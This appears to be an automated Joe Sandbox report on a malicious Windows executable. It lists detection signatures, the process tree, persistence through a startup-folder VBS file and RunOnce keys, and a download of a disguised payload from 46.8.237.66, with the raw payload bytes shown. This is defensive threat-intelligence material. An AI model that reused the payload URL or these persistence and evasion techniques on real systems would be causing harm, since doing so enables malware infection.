Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.3248.17662.exe

Overview

General Information

Sample name:SecuriteInfo.com.FileRepMalware.3248.17662.exe
Analysis ID:1545677
MD5:485927fe0c19012f31f1ef565254b374
SHA1:af67270688bdaca5c92425ce644f248703f80e41
SHA256:11d025152433189799f82de6b428f5ceb8ddb47573a38d51c267d48b891d498e
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Downloads files with wrong headers with respect to MIME Content-Type
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.FileRepMalware.3248.17662.exe (PID: 4136 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe" MD5: 485927FE0C19012F31F1EF565254B374)
    • seniorcommunicate.exe (PID: 6752 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe MD5: D9021E407CD5133BA842A9F6F21B606B)
      • InstallUtil.exe (PID: 3796 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
        • WerFault.exe (PID: 4620 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1172 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 5388 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000001.00000002.2539050952.0000000006FB0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: seniorcommunicate.exe PID: 6752JoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          Process Memory Space: seniorcommunicate.exe PID: 6752JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
            Click to see the 1 entries
            SourceRuleDescriptionAuthorStrings
            1.2.seniorcommunicate.exe.6fb0000.13.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              1.2.seniorcommunicate.exe.4a9df48.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                1.2.seniorcommunicate.exe.48105e8.7.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exe, ProcessId: 4136, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0

                  Data Obfuscation

                  barindex
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exe, ProcessId: 6752, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cvchost.vbs
                  No Suricata rule has matched

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeAvira: detected
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeAvira: detection malicious, Label: HEUR/AGEN.1323683
                  Source: C:\Users\user\AppData\Local\cvchost.exeAvira: detection malicious, Label: HEUR/AGEN.1323683
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeReversingLabs: Detection: 28%
                  Source: C:\Users\user\AppData\Local\cvchost.exeReversingLabs: Detection: 28%
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeReversingLabs: Detection: 47%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.5% probability
                  Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\seniorcommunicate.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Local\cvchost.exeJoe Sandbox ML: detected
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D30EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,0_2_00007FF71D1D30EC
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb0#x source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdbZ source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: eulUtil.pdbl source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: HP<o8C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: wextract.pdb source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: wextract.pdbGCTL source: SecuriteInfo.com.FileRepMalware.3248.17662.exe
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: ((.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004C25000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536372238.0000000006150000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdbllUtil.pdbpdbtil.pdb.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\System.pdbpv source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\System.pdbpdbtem.pdbc source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3360530165.00000000052F0000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Windows\InstallUtil.pdbpdbtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb.NETFrameworkv4.0.30319InstallUtil.exe source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000C37000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\System.pdb} source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb' source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbS source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\mscorlib.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.PDBp& source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: @Ho.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: symbols\exe\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\symbols\exe\InstallUtil.pdbps source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000B98000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3354251863.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ?HoC:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.pdb source: InstallUtil.exe, 00000006.00000002.3353785909.0000000000968000.00000004.00000010.00020000.00000000.sdmp
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00007FF71D1D204C

                  Networking

                  barindex
                  Source: httpBad PDF prefix: HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 19:19:01 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 25 Oct 2024 15:28:31 GMT ETag: "14dc08-6254ec57945c0" Accept-Ranges: bytes Content-Length: 1367048 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: a7 0a 18 02 b5 c3 96 d3 38 cf a1 58 89 4c 2b 78 3a a9 71 82 bc 15 61 17 45 18 df 31 b7 25 78 0c bf d9 cf 89 24 8f 86 02 ad fb 88 be 64 d0 0e a4 a4 8c ba 76 b4 de 75 91 eb 1a 7e 4b dc f1 46 70 0b b6 ba 7d f7 3f a8 a0 49 fc 49 e8 1a 7a 12 af 34 66 75 a6 62 be e2 00 d1 ff e6 db 15 7e b8 8f b9 09 ae 03 15 65 8f d2 0a a4 89 21 54 86 76 dd a1 f8 a1 16 63 cb 74 e9 4d 45 f4 b7 d9 e9 4a de 15 e3 b7 59 f4 9f 2c 1b 41 13 4e 6b d3 93 a2 32 f4 74 5a a8 ea 56 61 89 a4 a6 24 08 97 b5 a5 6c 68 30 cf 89 15 c2 86 7c f8 3e 24 eb 0d e6 ca 5e 06 26 09 6b 8b 73 08 94 4e 5b 03 9f 6c a3 24 1c 6b d2 d1 7c 49 28 98 23 43 2e 56 df 0b b8 6e d6 28 9d 18 15 f5 4b b0 c3 71 1f 29 d6 3c 6a 78 50 05 1a 93 20 67 f6 28 ff f4 d8 90 dc 34 e4 6a 33 94 83 5e 01 bc 61 74 ba b3 b3 2c 21 36 70 a4 84 23 c7 6c d9 ae be ec 0e 55 f6 f0 ea 3f 15 56 16 9b d1 3e b3 a4 e3 e4 7d f4 d5 57 7b 69 d7 2f df b3 8e 60 e9 09 0c 52 ea 44 2e f4 43 d4 fe ff ce d5 a8 0d 13 75 7f 33 47 47 e7 29 f9 a6 d5 23 ba b4 34 6b 16 ac 0a 93 f9 1d fc 23 09 f2 bf 5b 19 2a db 23 c2 43 a5 53 e7 78 59 70 c0 7f ee 84 e3 19 79 89 35 92 c1 b0 8d 13 9d e7 19 3b 3d cf b9 d0 cf 20 ec d4 f8 67 85 ef 5d fb ea ef 44 e0 42 7d 04 65 15 de e8 3c 0d 98 39 9e aa 7a b3 a9 5d ec be 0f c0 61 35 72 b3 a9 98 89 ef 30 84 d9 33 2a d2 59 1f ad ff 62 b2 b9 65 32 c1 54 38 f7 39 c3 42 0a 0f 99 5c 42 3c bb a7 89 1e da 6c 12 df 8b 25 68 f5 ed f9 7f 5e 58 c0 3c 5d ba 13 22 63 9d 0c 79 fe e8 24 db 4f 10 71 70 20 af 29 8d 95 ea 12 85 af 81 fb 50 9e f4 ad 59 25 b0 33 99 39 8b 6b fb 13 57 b4 f6 37 0d 1b c8 07 05 71 6e 6a 8b 94 f2 3f 01 68 c3 07 c5 cd f6 3c 69 e2 d9 e2 09 e0 9f 11 0d f7 6c 56 91 78 78 d0 1e 9f bd 2f cf fe fc af 67 ca e4 4a b8 fe 76 2c 54 3f 72 d7 19 fc 81 2b 53 ec a2 96 ba 3e 9c 3f 5e d3 a3 45 e1 c5 10 29 4a 0e dd 14 3a 3d b2 b0 de bd bb 47 37 e6 77 5f 66 b3 b4 01 bd 81 38 c4 84 9d f4 8d 18 f9 33 68 ce 7a 25 8e e6 1f 2a 39 c9 ae 03 de ea 08 29 10 72 c2 99 41 f2 54 cd bf bb 35 63 a1 87 c2 60 ab 2f ad d3 c8 43 35 ed 53 61 27 44 fe 5f 08 92 47 2f 26 e0 09 c6 17 96 18 b3 f8 e8 39 de 3d bd 76 34 bd f6 3e a8 48 41 5a ae d0 1d 2c ab 6b 8a a5 ac a8 06 68 0e 52 09 43 0b 38 75 8d 1f 6a 46 e2 3c 45 8a 3b 44 93 d9 de 7f f4 a2 08 ec 8b 9d 2c d8 fc 1e 38 09 e1 fa 3a 56 f7 91 df 05 2c f8 1d a3 16 29 ff c3 e3 2d 31 7d d2 ef d4 bf b5 09 a9 14 60 cb 69 65 d4 f8 3c 98 f3 c5 48 39 ea 20 54 7c ed c9 46 93 26 b1 c2 43 46 89 26 44 29 7c b8 90 44 b5 d3 1f 2e e1 ab a0 cb 44 9b da 1d f7 da c2 ca 04 a6 74 e1 20 3c 95 dc db bd 55 7c c3 7c 4b 2e 6c 24 ea 21 33 8b a7 19 e4 d6 de 08 dd a8 12 6a 48 7c 30 b1 f6 c5 51 5f ce 37 c1 84 ad d2 7c d5 14 d9 18 fc 75 41 46 8f 44 9b 6c a6 2e 35 2a 99 42 94 f8 a8 f1 99 6a 0c 00 61 aa 62 0a a4 01 26 10 dd 44 b4 e9 65 14 4b 8c 19 f5 8d 1a bd 34 e
                  Source: global trafficHTTP traffic detected: GET /spool01/Rhxkjsv.pdf HTTP/1.1Host: 46.8.237.66Connection: Keep-Alive
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: unknownTCP traffic detected without corresponding DNS query: 46.8.237.66
                  Source: global trafficHTTP traffic detected: GET /spool01/Rhxkjsv.pdf HTTP/1.1Host: 46.8.237.66Connection: Keep-Alive
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.8.237.66
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.8.237.66/spool01/Rhxkjsv.pdf
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000000.2106899462.0000000000FB2000.00000002.00000001.01000000.00000004.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://46.8.237.66/spool01/Rhxkjsv.pdfV
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ocsp.thawte.com0
                  Source: seniorcommunicate.exe, 00000001.00000002.2524102736.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                  Source: SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106705295.000001B8E4E17000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.FileRepMalware.3248.17662.exe, 00000000.00000003.2106622974.000001B8E6C12000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2536908495.0000000006B0E000.00000004.00000020.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.000000000382C000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe.0.dr, cvchost.exe.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2524102736.0000000003363000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                  Source: seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004645000.00000004.00000800.00020000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2538830315.0000000006EE0000.00000004.08000000.00040000.00000000.sdmp, seniorcommunicate.exe, 00000001.00000002.2531478782.0000000004BD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D2C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF71D1D2C54
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF71D1D1C0C
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.3248.17662.exeCode function: 0_2_00007FF71D1D1D280_2_00007FF71D1D1D28
